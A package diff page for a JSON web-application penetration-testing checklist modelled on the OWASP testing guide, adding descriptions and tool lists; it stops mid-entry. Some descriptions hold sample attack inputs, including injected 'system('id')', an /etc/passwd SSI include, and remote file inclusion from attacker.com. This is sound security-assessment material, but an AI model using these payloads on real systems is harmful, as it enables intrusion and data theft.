bmt 0.1.1 → 0.4.0

Sign up to get free protection for your applications and to get access to all the features.
@@ -11,59 +11,80 @@
11
11
  "key": "information",
12
12
  "title": "Information gathering",
13
13
  "description": "",
14
+ "type": "checklist",
14
15
  "items": [
15
16
  {
16
17
  "key": "search_engine_discovery_and_reconnaissance",
17
18
  "title": "Conduct Search Engine Discovery and Reconnaissance for Information Leakage",
18
- "description": "OTG-INFO-001, WAHHM - Recon and Analysis",
19
+ "caption": "OTG-INFO-001, WAHHM - Recon and Analysis",
20
+ "description": "Use a search engine to search for Network diagrams and Configurations, Credentials, Error message content.",
21
+ "tools": "Google Hacking, Sitedigger, Shodan, FOCA, Punkspider",
19
22
  "vrt_category": "sensitive_data_exposure"
20
23
  },
21
24
  {
22
25
  "key": "fingerprint",
23
26
  "title": "Fingerprint Web Server",
24
- "description": "OTG-INFO-002, WAHHM - Recon and Analysis",
27
+ "caption": "OTG-INFO-002, WAHHM - Recon and Analysis",
28
+ "description": "Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. Using 'HTTP header field ordering' and 'Malformed requests test.'",
29
+ "tools": "Httprint, Httprecon, Desenmascarame",
25
30
  "vrt_category": "server_security_misconfiguration"
26
31
  },
27
32
  {
28
33
  "key": "webserver_metafiles",
29
34
  "title": "Review Webserver Metafiles for Information Leakage",
30
- "description": "OTG-INFO-003, WAHHM - Recon and Analysis"
35
+ "caption": "OTG-INFO-003, WAHHM - Recon and Analysis",
36
+ "description": "Analyze robots.txt and identify <META> Tags from website.",
37
+ "tools": "Browser, curl, wget"
31
38
  },
32
39
  {
33
40
  "key": "enumerate_applications",
34
41
  "title": "Enumerate Applications on Webserver",
35
- "description": "if in scope OTG-INFO-004, WAHHM - Recon and Analysis"
42
+ "caption": "if in scope OTG-INFO-004, WAHHM - Recon and Analysis",
43
+ "description": "Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers",
44
+ "tools": "Webhosting.info, dnsrecon, Nmap, fierce, Recon-ng, Intrigue"
36
45
  },
37
46
  {
38
47
  "key": "webpage_comments_and_metadata",
39
48
  "title": "Review Webpage Comments and Metadata for Information Leakage",
40
- "description": "OTG-INFO-005, WAHHM - Recon and Analysis",
49
+ "caption": "OTG-INFO-005, WAHHM - Recon and Analysis",
50
+ "description": "Find sensitive information from webpage comments and Metadata on source code.",
51
+ "tools": "Browser, curl, wget",
41
52
  "vrt_category": "sensitive_data_exposure"
42
53
  },
43
54
  {
44
55
  "key": "application_entry_points",
45
56
  "title": "Identify application entry points",
46
- "description": "OTG-INFO-006, WAHHM - Recon and Analysis"
57
+ "caption": "OTG-INFO-006, WAHHM - Recon and Analysis",
58
+ "description": "Identify from hidden fields, parameters, methods HTTP header analysis",
59
+ "tools": "Burp proxy, ZAP, Tamper data"
47
60
  },
48
61
  {
49
62
  "key": "execution_paths",
50
63
  "title": "Map execution paths through application",
51
- "description": "OTG-INFO-007, WAHHM - Recon and Analysis"
64
+ "caption": "OTG-INFO-007, WAHHM - Recon and Analysis",
65
+ "description": "Map the target application and understand the principal workflows.",
66
+ "tools": "Burp proxy, ZAP"
52
67
  },
53
68
  {
54
69
  "key": "fingerprint_webapp_framework",
55
70
  "title": "Fingerprint Web Application Framework",
56
- "description": "OTG-INFO-008, WAHHM - Recon and Analysis"
71
+ "caption": "OTG-INFO-008, WAHHM - Recon and Analysis",
72
+ "description": "Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders.",
73
+ "tools": "Whatweb, BlindElephant, Wappalyzer"
57
74
  },
58
75
  {
59
76
  "key": "fingerprint_webapp",
60
77
  "title": "Fingerprint Web Application",
61
- "description": "OTG-INFO-009, WAHHM - Recon and Analysis"
78
+ "caption": "OTG-INFO-009, WAHHM - Recon and Analysis",
79
+ "description": "Identify the web application and version to determine known vulnerabilities and the appropriate exploits.",
80
+ "tools": "Whatweb, BlindElephant, Wappalyzer"
62
81
  },
63
82
  {
64
83
  "key": "application_architecture",
65
84
  "title": "Map Application Architecture",
66
- "description": "OTG-INFO-010, WAHHM - Recon and Analysis"
85
+ "caption": "OTG-INFO-010, WAHHM - Recon and Analysis",
86
+ "description": "Identify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database",
87
+ "tools": "Browser, curl, wget"
67
88
  }
68
89
  ]
69
90
  },
@@ -71,52 +92,69 @@
71
92
  "key": "config_and_deploy_management",
72
93
  "title": "Configuration and Deploy Management Testing",
73
94
  "description": "",
95
+ "type": "checklist",
74
96
  "items": [
75
97
  {
76
98
  "key": "network_and_infrastructure",
77
99
  "title": "Test Network/Infrastructure Configuration",
78
- "description": "OTG-CONFIG-001, WAHHM - Recon and Analysis, Assess Application Hosting",
100
+ "caption": "OTG-CONFIG-001, WAHHM - Recon and Analysis, Assess Application Hosting",
101
+ "description": "Understand the infrastructure elements interactions, config management for software, backend DB server, WebDAV, FTP in order to identify known vulnerabilities.",
102
+ "tools": "Nessus",
79
103
  "vrt_category": "server_security_misconfiguration"
80
104
  },
81
105
  {
82
106
  "key": "application_platform",
83
107
  "title": "Test Application Platform Configuration",
84
- "description": "OTG-CONFIG-002, WAHHM - Recon and Analysis",
108
+ "caption": "OTG-CONFIG-002, WAHHM - Recon and Analysis",
109
+ "description": "Identify default installation file/directory, Handle Server errors (40*,50*), Minimal Privilege, Software logging.",
110
+ "tools": "Browser, Nikto",
85
111
  "vrt_category": "server_security_misconfiguration"
86
112
  },
87
113
  {
88
114
  "key": "file_extensions_handling",
89
115
  "title": "Test File Extensions Handling for Sensitive Information",
90
- "description": "OTG-CONFIG-003, WAHHM - Recon and Analysis",
116
+ "caption": "OTG-CONFIG-003, WAHHM - Recon and Analysis",
117
+ "description": "Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc)",
118
+ "tools": "Browser, Nikto",
91
119
  "vrt_category": "sensitive_data_exposure"
92
120
  },
93
121
  {
94
122
  "key": "backup_and_unreferenced_files",
95
123
  "title": "Backup and Unreferenced Files for Sensitive Information",
96
- "description": "OTG-CONFIG-004, WAHHM - Recon and Analysis",
124
+ "caption": "OTG-CONFIG-004, WAHHM - Recon and Analysis",
125
+ "description": "Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename",
126
+ "tools": "Nessus, Nikto, Wikto",
97
127
  "vrt_category": "sensitive_data_exposure"
98
128
  },
99
129
  {
100
130
  "key": "admin_interfaces",
101
131
  "title": "Enumerate Infrastructure and Application Admin Interfaces",
102
- "description": "OTG-CONFIG-005, WAHHM - Recon and Analysis"
132
+ "caption": "OTG-CONFIG-005, WAHHM - Recon and Analysis",
133
+ "description": "Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)",
134
+ "tools": "Burp Proxy, dirb, Dirbuster, fuzzdb, Tilde Scanner"
103
135
  },
104
136
  {
105
137
  "key": "http_methods",
106
138
  "title": "Test HTTP Methods",
107
- "description": "OTG-CONFIG-006, WAHHM - Test Handling of Access",
139
+ "caption": "OTG-CONFIG-006, WAHHM - Test Handling of Access",
140
+ "description": "Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST",
141
+ "tools": "netcat, curl",
108
142
  "vrt_category": "server_security_misconfiguration"
109
143
  },
110
144
  {
111
145
  "key": "http_transport_security",
112
146
  "title": "Test HTTP Strict Transport Security",
113
- "description": "OTG-CONFIG-007, WAHHM - Test Handling of Access",
147
+ "caption": "OTG-CONFIG-007, WAHHM - Test Handling of Access",
148
+ "description": "Identify HSTS header on Web server through HTTP response header. curl -s -D- https://domain.com/ | grep Strict",
149
+ "tools": "Burp Proxy, ZAP, curl",
114
150
  "vrt_category": "server_security_misconfiguration"
115
151
  },
116
152
  {
117
153
  "key": "ria_cross_domain_policy",
118
154
  "title": "Test RIA cross domain policy",
119
- "description": "OTG-CONFIG-008, WAHHM - Test Handling of Access",
155
+ "caption": "OTG-CONFIG-008, WAHHM - Test Handling of Access",
156
+ "description": "Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.",
157
+ "tools": "Burp Proxy, ZAP, Nikto",
120
158
  "vrt_category": "server_security_misconfiguration"
121
159
  }
122
160
  ]
@@ -125,46 +163,61 @@
125
163
  "key": "identity_management",
126
164
  "title": "Identity Management Testing",
127
165
  "description": "",
166
+ "type": "checklist",
128
167
  "items": [
129
168
  {
130
169
  "key": "role_definition",
131
170
  "title": "Test Role Definitions",
132
- "description": "OTG-IDENT-001, WAHHM - Test Handling of Access",
171
+ "caption": "OTG-IDENT-001, WAHHM - Test Handling of Access",
172
+ "description": "Validate the system roles defined within the application by creating a permission matrix.",
173
+ "tools": "Burp Proxy, ZAP",
133
174
  "vrt_category": "broken_access_control"
134
175
  },
135
176
  {
136
177
  "key": "user_registration",
137
178
  "title": "Test User Registration Process",
138
- "description": "OTG-IDENT-002, WAHHM - Test Handling of Access",
179
+ "caption": "OTG-IDENT-002, WAHHM - Test Handling of Access",
180
+ "description": "Verify that the identity requirements for user registration are aligned with business and security requirements",
181
+ "tools": "Burp Proxy, ZAP",
139
182
  "vrt_category": "server_security_misconfiguration"
140
183
  },
141
184
  {
142
185
  "key": "account_provisioning",
143
186
  "title": "Test Account Provisioning Process",
144
- "description": "OTG-IDENT-003, WAHHM - Test Handling of Access"
187
+ "caption": "OTG-IDENT-003, WAHHM - Test Handling of Access",
188
+ "description": "Determine which roles are able to provision users and what sort of accounts they can provision.",
189
+ "tools": "Burp Proxy, ZAP"
145
190
  },
146
191
  {
147
192
  "key": "guessable_user_accounts",
148
193
  "title": "Testing for Account Enumeration and Guessable User Account",
149
- "description": "OTG-IDENT-004, WAHHM - Test Handling of Access",
194
+ "caption": "OTG-IDENT-004, WAHHM - Test Handling of Access",
195
+ "description": "Generic login error statement check, return codes/parameter values, enumerate all possible valid user ids (Login system, Forgot password)",
196
+ "tools": "Browser, Burp Proxy, ZAP",
150
197
  "vrt_category": "server_security_misconfiguration"
151
198
  },
152
199
  {
153
200
  "key": "username_policy",
154
201
  "title": "Testing for Weak or unenforced username policy",
155
- "description": "OTG-IDENT-005, WAHHM - Test Handling of Access",
202
+ "caption": "OTG-IDENT-005, WAHHM - Test Handling of Access",
203
+ "description": "User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed.",
204
+ "tools": "Browser, Burp Proxy, ZAP",
156
205
  "vrt_category": "server_security_misconfiguration"
157
206
  },
158
207
  {
159
208
  "key": "guest_accounts_permission",
160
209
  "title": "Test Permissions of Guest/Training Accounts",
161
- "description": "OTG-IDENT-006, WAHHM - Test Handling of Access",
210
+ "caption": "OTG-IDENT-006, WAHHM - Test Handling of Access",
211
+ "description": "Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorization process required for access. Evaluate consistency between access policy and guest/training account access permissions.",
212
+ "tools": "Burp Proxy, ZAP",
162
213
  "vrt_category": "server_security_misconfiguration"
163
214
  },
164
215
  {
165
216
  "key": "account_suspension_resumption",
166
217
  "title": "Test Account Suspension/Resumption Process",
167
- "description": "OTG-IDENT-007, WAHHM - Test Handling of Access",
218
+ "caption": "OTG-IDENT-007, WAHHM - Test Handling of Access",
219
+ "description": "Verify the identity requirements for user registration align with business/security requirements. Validate the registration process.",
220
+ "tools": "Burp Proxy, ZAP",
168
221
  "vrt_category": "server_security_misconfiguration"
169
222
  }
170
223
  ]
@@ -173,65 +226,86 @@
173
226
  "key": "authentication",
174
227
  "title": "Authentication Testing",
175
228
  "description": "",
229
+ "type": "checklist",
176
230
  "items": [
177
231
  {
178
232
  "key": "encrypted_credentials",
179
233
  "title": "Testing for Credentials Transported over an Encrypted Channel",
180
- "description": "OTG-AUTHN-001, WAHHM - Miscellaneous Tests",
234
+ "caption": "OTG-AUTHN-001, WAHHM - Miscellaneous Tests",
235
+ "description": "Check the referrer whether it’s HTTP or HTTPs. Sending data through HTTP and HTTPS.",
236
+ "tools": "Burp Proxy, ZAP",
181
237
  "vrt_category": "broken_authentication_and_session_management"
182
238
  },
183
239
  {
184
240
  "key": "default_credentials",
185
241
  "title": "Testing for default credentials",
186
- "description": "OTG-AUTHN-002, WAHHM - Test Handling of Access",
242
+ "caption": "OTG-AUTHN-002, WAHHM - Test Handling of Access",
243
+ "description": "Testing for default credentials of common applications, Testing for default password of new accounts.",
244
+ "tools": "Burp Proxy, ZAP, Hydra",
187
245
  "vrt_category": "server_security_misconfiguration"
188
246
  },
189
247
  {
190
248
  "key": "lock_out_mechanism",
191
249
  "title": "Testing for Weak lock out mechanism",
192
- "description": "OTG-AUTHN-003, WAHHM - Test Handling of Access",
250
+ "caption": "OTG-AUTHN-003, WAHHM - Test Handling of Access",
251
+ "description": "Evaluate the account lockout mechanism’s ability to mitigate brute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.",
252
+ "tools": "Browser",
193
253
  "vrt_category": "server_security_misconfiguration"
194
254
  },
195
255
  {
196
256
  "key": "bypass_schema",
197
257
  "title": "Testing for bypassing authentication schema",
198
- "description": "OTG-AUTHN-004, WAHHM - Test Handling of Access",
258
+ "caption": "OTG-AUTHN-004, WAHHM - Test Handling of Access",
259
+ "description": "Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection",
260
+ "tools": "Burp Proxy, ZAP",
199
261
  "vrt_category": "broken_authentication_and_session_management"
200
262
  },
201
263
  {
202
264
  "key": "remember_password",
203
265
  "title": "Test remember password functionality",
204
- "description": "OTG-AUTHN-005, WAHHM - Test Handling of Access",
266
+ "caption": "OTG-AUTHN-005, WAHHM - Test Handling of Access",
267
+ "description": "Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?",
268
+ "tools": "Burp Proxy, ZAP",
205
269
  "vrt_category": "broken_authentication_and_session_management"
206
270
  },
207
271
  {
208
272
  "key": "browser_cache",
209
273
  "title": "Testing for Browser cache weakness",
210
- "description": "OTG-AUTHN-006, WAHHM - Miscellaneous Tests",
274
+ "caption": "OTG-AUTHN-006, WAHHM - Miscellaneous Tests",
275
+ "description": "Check browser history issues by clicking the 'Back' button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)",
276
+ "tools": "Burp Proxy, ZAP, Firefox add-on CacheViewer2",
211
277
  "vrt_category": "server_security_misconfiguration"
212
278
  },
213
279
  {
214
280
  "key": "password_policy",
215
281
  "title": "Testing for Weak password policy",
216
- "description": "OTG-AUTHN-007, WAHHM - Test Handling of Access",
282
+ "caption": "OTG-AUTHN-007, WAHHM - Test Handling of Access",
283
+ "description": "Determine the resistance of the application against brute force password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of Passwords.",
284
+ "tools": "Burp Proxy, ZAP, Hydra",
217
285
  "vrt_category": "insufficient_security_configurability"
218
286
  },
219
287
  {
220
288
  "key": "security_question",
221
289
  "title": "Testing for Weak security question/answer",
222
- "description": "OTG-AUTHN-008, WAHHM - Test Handling of Access",
290
+ "caption": "OTG-AUTHN-008, WAHHM - Test Handling of Access",
291
+ "description": "Testing for weak pre-generated questions, Testing for weak self-generated questions, Testing for brute-forcible answers (Unlimited attempts?)",
292
+ "tools": "Browser",
223
293
  "vrt_category": "broken_authentication_and_session_management"
224
294
  },
225
295
  {
226
296
  "key": "change_password",
227
297
  "title": "Testing for weak password change or reset functionalities",
228
- "description": "OTG-AUTHN-009, WAHHM - Test Handling of Access",
298
+ "caption": "OTG-AUTHN-009, WAHHM - Test Handling of Access",
299
+ "description": "Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?",
300
+ "tools": "Browser, Burp Proxy, ZAP",
229
301
  "vrt_category": "broken_authentication_and_session_management"
230
302
  },
231
303
  {
232
304
  "key": "alternative_channel",
233
305
  "title": "Testing for Weaker authentication in alternative channel",
234
- "description": "OTG-AUTHN-010, WAHHM - Test Handling of Access"
306
+ "caption": "OTG-AUTHN-010, WAHHM - Test Handling of Access",
307
+ "description": "Understand the primary mechanism and Identify other channels (Mobile App, Call center, SSO)",
308
+ "tools": "Browser"
235
309
  }
236
310
  ]
237
311
  },
@@ -239,29 +313,38 @@
239
313
  "key": "authorization",
240
314
  "title": "Authorization Testing",
241
315
  "description": "",
316
+ "type": "checklist",
242
317
  "items": [
243
318
  {
244
319
  "key": "directory_traversal_and_file_include",
245
320
  "title": "Testing Directory traversal/file include",
246
- "description": "OTG-AUTHZ-001, WAHHM - Test Handling of Input",
321
+ "caption": "OTG-AUTHZ-001, WAHHM - Test Handling of Input",
322
+ "description": "dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion.",
323
+ "tools": "Burp Proxy, ZAP, Wfuzz",
247
324
  "vrt_category": "server_side_injection"
248
325
  },
249
326
  {
250
327
  "key": "bypass_schema",
251
328
  "title": "Testing for bypassing authorization schema",
252
- "description": "OTG-AUTHZ-002, WAHHM - Test Handling of Access",
329
+ "caption": "OTG-AUTHZ-002, WAHHM - Test Handling of Access",
330
+ "description": "Access a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)",
331
+ "tools": "Burp Proxy (Authorize), ZAP",
253
332
  "vrt_category": "broken_access_control"
254
333
  },
255
334
  {
256
335
  "key": "privilege_escalation",
257
336
  "title": "Testing for Privilege Escalation",
258
- "description": "OTG-AUTHZ-003, WAHHM - Test Handling of Access",
337
+ "caption": "OTG-AUTHZ-003, WAHHM - Test Handling of Access",
338
+ "description": "Testing for role/privilege manipulates the values of hidden variables. Change some param groupid=2 to groupid=1",
339
+ "tools": "Burp Proxy (Authorize), ZAP",
259
340
  "vrt_category": "broken_authentication_and_session_management"
260
341
  },
261
342
  {
262
343
  "key": "direct_object_reference",
263
344
  "title": "Testing for Insecure Direct Object References",
264
- "description": "OTG-AUTHZ-004, WAHHM - Test Handling of Access",
345
+ "caption": "OTG-AUTHZ-004, WAHHM - Test Handling of Access",
346
+ "description": "Force changing parameter value (?invoice=123 -> ?invoice=456)",
347
+ "tools": "Burp Proxy (Authorize), ZAP",
265
348
  "vrt_category": "broken_access_control"
266
349
  }
267
350
  ]
@@ -270,53 +353,70 @@
270
353
  "key": "session_management",
271
354
  "title": "Session Management Testing",
272
355
  "description": "",
356
+ "type": "checklist",
273
357
  "items": [
274
358
  {
275
359
  "key": "bypass_schema",
276
360
  "title": "Testing for Bypassing Session Management Schema",
277
- "description": "OTG-SESS-001, WAHHM - Test Handling of Access",
361
+ "caption": "OTG-SESS-001, WAHHM - Test Handling of Access",
362
+ "description": "SessionID analysis prediction, unencrypted cookie transport, brute-force.",
363
+ "tools": "Burp Proxy, ForceSSL, ZAP, CookieDigger",
278
364
  "vrt_category": "broken_authentication_and_session_management"
279
365
  },
280
366
  {
281
367
  "key": "cookies",
282
368
  "title": "Testing for Cookies attributes",
283
- "description": "OTG-SESS-002, WAHHM - Test Handling of Access",
369
+ "caption": "OTG-SESS-002, WAHHM - Test Handling of Access",
370
+ "description": "Check HTTPOnly and Secure flag expiration, inspect for sensitive data.",
371
+ "tools": "Burp Proxy, ZAP",
284
372
  "vrt_category": "server_security_misconfiguration"
285
373
  },
286
374
  {
287
375
  "key": "fixation",
288
376
  "title": "Testing for Session Fixation",
289
- "description": "OTG-SESS-003, WAHHM - Test Handling of Access",
377
+ "caption": "OTG-SESS-003, WAHHM - Test Handling of Access",
378
+ "description": "The application doesn't renew the cookie after a successful user authentication.",
379
+ "tools": "Burp Proxy, ZAP",
290
380
  "vrt_category": "broken_authentication_and_session_management"
291
381
  },
292
382
  {
293
383
  "key": "exposed_variables",
294
384
  "title": "Testing for Exposed Session Variables",
295
- "description": "OTG-SESS-004, WAHHM - Test Handling of Access",
385
+ "caption": "OTG-SESS-004, WAHHM - Test Handling of Access",
386
+ "description": "Encryption & Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?",
387
+ "tools": "Burp Proxy, ZAP",
296
388
  "vrt_category": "broken_authentication_and_session_management"
297
389
  },
298
390
  {
299
391
  "key": "csrf",
300
392
  "title": "Testing for Cross Site Request Forgery",
301
- "description": "OTG-SESS-005, WAHHM - Test Handling of Access",
393
+ "caption": "OTG-SESS-005, WAHHM - Test Handling of Access",
394
+ "description": "URL analysis, Direct access to functions without any token.",
395
+ "tools": "Burp Proxy (csrf_token_detect), burpy, ZAP",
302
396
  "vrt_category": "cross_site_request_forgery_csrf"
303
397
  },
304
398
  {
305
399
  "key": "logout",
306
400
  "title": "Testing for logout functionality",
307
- "description": "OTG-SESS-006, WAHHM - Test Handling of Access",
401
+ "caption": "OTG-SESS-006, WAHHM - Test Handling of Access",
402
+ "description": "Check reuse session after logout both server-side and SSO.",
403
+ "tools": "Burp Proxy, ZAP",
308
404
  "vrt_category": "broken_authentication_and_session_management"
309
405
  },
310
406
  {
311
407
  "key": "timeout",
312
408
  "title": "Test Session Timeout",
313
- "description": "OTG-SESS-007, WAHHM - Test Handling of Access",
409
+ "caption": "OTG-SESS-007, WAHHM - Test Handling of Access",
410
+ "description": "Check session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.",
411
+ "tools": "Burp Proxy, ZAP",
314
412
  "vrt_category": "broken_authentication_and_session_management"
315
413
  },
316
414
  {
317
415
  "key": "puzzling",
318
416
  "title": "Testing for Session puzzling",
319
- "description": "OTG-SESS-008, WAHHM - Test Handling of Access",
417
+ "caption": "OTG-SESS-008, WAHHM - Test Handling of Access",
418
+ "description": "The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.",
419
+ "tools": "Burp Proxy, ZAP",
320
420
  "vrt_category": "broken_authentication_and_session_management"
321
421
  }
322
422
  ]
@@ -325,155 +425,210 @@
325
425
  "key": "data_validation",
326
426
  "title": "Data Validation Testing",
327
427
  "description": "",
428
+ "type": "checklist",
328
429
  "items": [
329
430
  {
330
431
  "key": "reflected_xss",
331
432
  "title": "Testing for Reflected Cross Site Scripting",
332
- "description": "OTG-INPVAL-001, WAHHM - Test Handling of Input"
433
+ "caption": "OTG-INPVAL-001, WAHHM - Test Handling of Input",
434
+ "description": "Check for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.",
435
+ "tools": "Burp Proxy, ZAP, Xenotix XSS"
333
436
  },
334
437
  {
335
438
  "key": "stored_xss",
336
439
  "title": "Testing for Stored Cross Site Scripting",
337
- "description": "OTG-INPVAL-002, WAHHM - Test Handling of Input",
440
+ "caption": "OTG-INPVAL-002, WAHHM - Test Handling of Input",
441
+ "description": "Check input forms/Upload forms and analyze HTML codes, Leverage XSS with BeEF",
442
+ "tools": "Burp Proxy, ZAP, BeEF, XSS Proxy",
338
443
  "vrt_category": "cross_site_scripting_xss"
339
444
  },
340
445
  {
341
446
  "key": "http_verb_tampering",
342
447
  "title": "Testing for HTTP Verb Tampering",
343
- "description": "OTG-INPVAL-003, WAHHM - Test Handling of Input",
448
+ "caption": "OTG-INPVAL-003, WAHHM - Test Handling of Input",
449
+ "description": "Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.",
450
+ "tools": "netcat",
344
451
  "vrt_category": "server_security_misconfiguration"
345
452
  },
346
453
  {
347
454
  "key": "http_param_pollution",
348
455
  "title": "Testing for HTTP Parameter pollution",
349
- "description": "OTG-INPVAL-004, WAHHM - Test Handling of Input",
456
+ "caption": "OTG-INPVAL-004, WAHHM - Test Handling of Input",
457
+ "description": "Identify any form or action that allows user-supplied input to bypass Input validation and filters using HPP",
458
+ "tools": "ZAP, HPP Finder (Chrome Plugin)",
350
459
  "vrt_category": "server_side_injection"
351
460
  },
352
461
  {
353
462
  "key": "sql_injection",
354
463
  "title": "Testing for SQL Injection",
355
- "description": "OTG-INPVAL-005, WAHHM - Test Handling of Input",
464
+ "caption": "OTG-INPVAL-005, WAHHM - Test Handling of Input",
465
+ "description": "Union, Boolean, Error based, Out-of-band, Time delay.",
466
+ "tools": "Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB)",
356
467
  "vrt_category": "server_side_injection"
357
468
  },
358
469
  {
359
470
  "key": "oracle",
360
471
  "title": "Oracle Testing",
361
- "description": ""
472
+ "caption": "",
473
+ "description": "Identify URLs for PL/SQL web applications, Access with PL/SQL Packages, Bypass PL/SQL Exclusion list, SQL Injection",
474
+ "tools": "Orascan, SQLInjector"
362
475
  },
363
476
  {
364
477
  "key": "mysql",
365
478
  "title": "MySQL Testing",
366
- "description": ""
479
+ "caption": "",
480
+ "description": "Identify MySQL version, Single quote, Information_schema, Read/Write file.",
481
+ "tools": "SQLMap, Mysqloit, Power Injector"
367
482
  },
368
483
  {
369
484
  "key": "sql_server",
370
485
  "title": "SQL Server Testing",
371
- "description": ""
486
+ "caption": "",
487
+ "description": "Comment operator (- -), Query separator (;), Stored procedures (xp_cmdshell)",
488
+ "tools": "SQLMap, SQLninja, Power Injector"
372
489
  },
373
490
  {
374
491
  "key": "postgre_sql",
375
492
  "title": "Testing PostgreSQL",
376
- "description": ""
493
+ "caption": "",
494
+ "description": "Determine that the backend database engine is PostgreSQL by using the :: cast operator. Read/Write file, Shell Injection (OS command)",
495
+ "tools": "SQLMap"
377
496
  },
378
497
  {
379
498
  "key": "ms_access",
380
499
  "title": "MS Access Testing",
381
- "description": ""
500
+ "caption": "",
501
+ "description": "Enumerate the column through error-based (Group by), Obtain database schema combine with fuzzdb.",
502
+ "tools": "SQLMap"
382
503
  },
383
504
  {
384
505
  "key": "nosql_injection",
385
506
  "title": "Testing for NoSQL injection",
386
- "description": ""
507
+ "caption": "",
508
+ "description": "dentify NoSQL databases, Pass special characters (' \" \\ ; { } ), Attack with reserved variable name, operator.",
509
+ "tools": "NoSQLMap"
387
510
  },
388
511
  {
389
512
  "key": "ldap_injection",
390
513
  "title": "Testing for LDAP Injection",
391
- "description": "OTG-INPVAL-006, WAHHM - Test Handling of Input",
514
+ "caption": "OTG-INPVAL-006, WAHHM - Test Handling of Input",
515
+ "description": "/ldapsearch?user=*user=*user=*)(uid=*))(|(uid=*pass=password",
516
+ "tools": "Burp Proxy, ZAP",
392
517
  "vrt_category": "server_side_injection"
393
518
  },
394
519
  {
395
520
  "key": "orm_injection",
396
521
  "title": "Testing for ORM Injection",
397
- "description": "OTG-INPVAL-007, WAHHM - Test Handling of Input",
522
+ "caption": "OTG-INPVAL-007, WAHHM - Test Handling of Input",
523
+ "description": "Testing ORM injection is identical to SQL injection testing",
524
+ "tools": "Hibernate, Nhibernate",
398
525
  "vrt_category": "server_side_injection"
399
526
  },
400
527
  {
401
528
  "key": "xml_injection",
402
529
  "title": "Testing for XML Injection",
403
- "description": "OTG-INPVAL-008, WAHHM - Test Handling of Input",
530
+ "caption": "OTG-INPVAL-008, WAHHM - Test Handling of Input",
531
+ "description": "Check with XML Meta Characters', \" , <>, <!--/-->, &, <![CDATA[ / ]]>, XXE, TAG",
532
+ "tools": "Burp Proxy, ZAP, Wfuzz",
404
533
  "vrt_category": "server_side_injection"
405
534
  },
406
535
  {
407
536
  "key": "ssi_injection",
408
537
  "title": "Testing for SSI Injection",
409
- "description": "OTG-INPVAL-009, WAHHM - Test Handling of Input",
538
+ "caption": "OTG-INPVAL-009, WAHHM - Test Handling of Input",
539
+ "description": "Presence of .shtml extension, Check for these characters, < ! # = / . \" - > and [a-zA-Z0-9], include String = <!--#include virtual='/etc/passwd'",
540
+ "tools": "Burp Proxy, ZAP",
410
541
  "vrt_category": "server_side_injection"
411
542
  },
412
543
  {
413
544
  "key": "xpath_injection",
414
545
  "title": "Testing for XPath Injection",
415
- "description": "OTG-INPVAL-010, WAHHM - Test Handling of Input",
546
+ "caption": "OTG-INPVAL-010, WAHHM - Test Handling of Input",
547
+ "description": "Check for XML error enumeration by supplying a single quote (').\nUsername: ‘ or ‘1’ = ‘1\nPassword: ‘ or ‘1’ = ‘1",
548
+ "tools": "Burp Proxy, ZAP",
416
549
  "vrt_category": "server_side_injection"
417
550
  },
418
551
  {
419
552
  "key": "imap_smtp_injection",
420
553
  "title": "IMAP/SMTP Injection",
421
- "description": "OTG-INPVAL-011, WAHHM - Test Handling of Input",
554
+ "caption": "OTG-INPVAL-011, WAHHM - Test Handling of Input",
555
+ "description": "Identifying vulnerable parameters with special characters (i.e.: \\, ‘, “, @, #, !, |).\nUnderstanding the data flow and deployment structure of the client\nIMAP/SMTP command injection (Header, Body, Footer)",
556
+ "tools": "Burp Proxy, ZAP",
422
557
  "vrt_category": "server_side_injection"
423
558
  },
424
559
  {
425
560
  "key": "code_injection",
426
561
  "title": "Testing for Code Injection",
427
- "description": "OTG-INPVAL-012, WAHHM - Test Handling of Input",
562
+ "caption": "OTG-INPVAL-012, WAHHM - Test Handling of Input",
563
+ "description": "Enter OS commands in the input field.?arg=1; system('id')",
564
+ "tools": "Burp Proxy, ZAP, Liffy, Panoptic",
428
565
  "vrt_category": "server_side_injection"
429
566
  },
430
567
  {
431
568
  "key": "local_file_inclusion",
432
569
  "title": "Testing for Local File Inclusion",
433
- "description": ""
570
+ "caption": "",
571
+ "description": "LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource)",
572
+ "tools": "Burp Proxy, fimap, Liffy"
434
573
  },
435
574
  {
436
575
  "key": "remote_file_inclusion",
437
576
  "title": "Testing for Remote File Inclusion",
438
- "description": ""
577
+ "caption": "",
578
+ "description": "RFI from malicious URL ?page.php?file=http://attacker.com/malicious_page",
579
+ "tools": "Burp Proxy, fimap, Liffy"
439
580
  },
440
581
  {
441
582
  "key": "command_injection",
442
583
  "title": "Testing for Command Injection",
443
- "description": "OTG-INPVAL-013, WAHHM - Test Handling of Input",
584
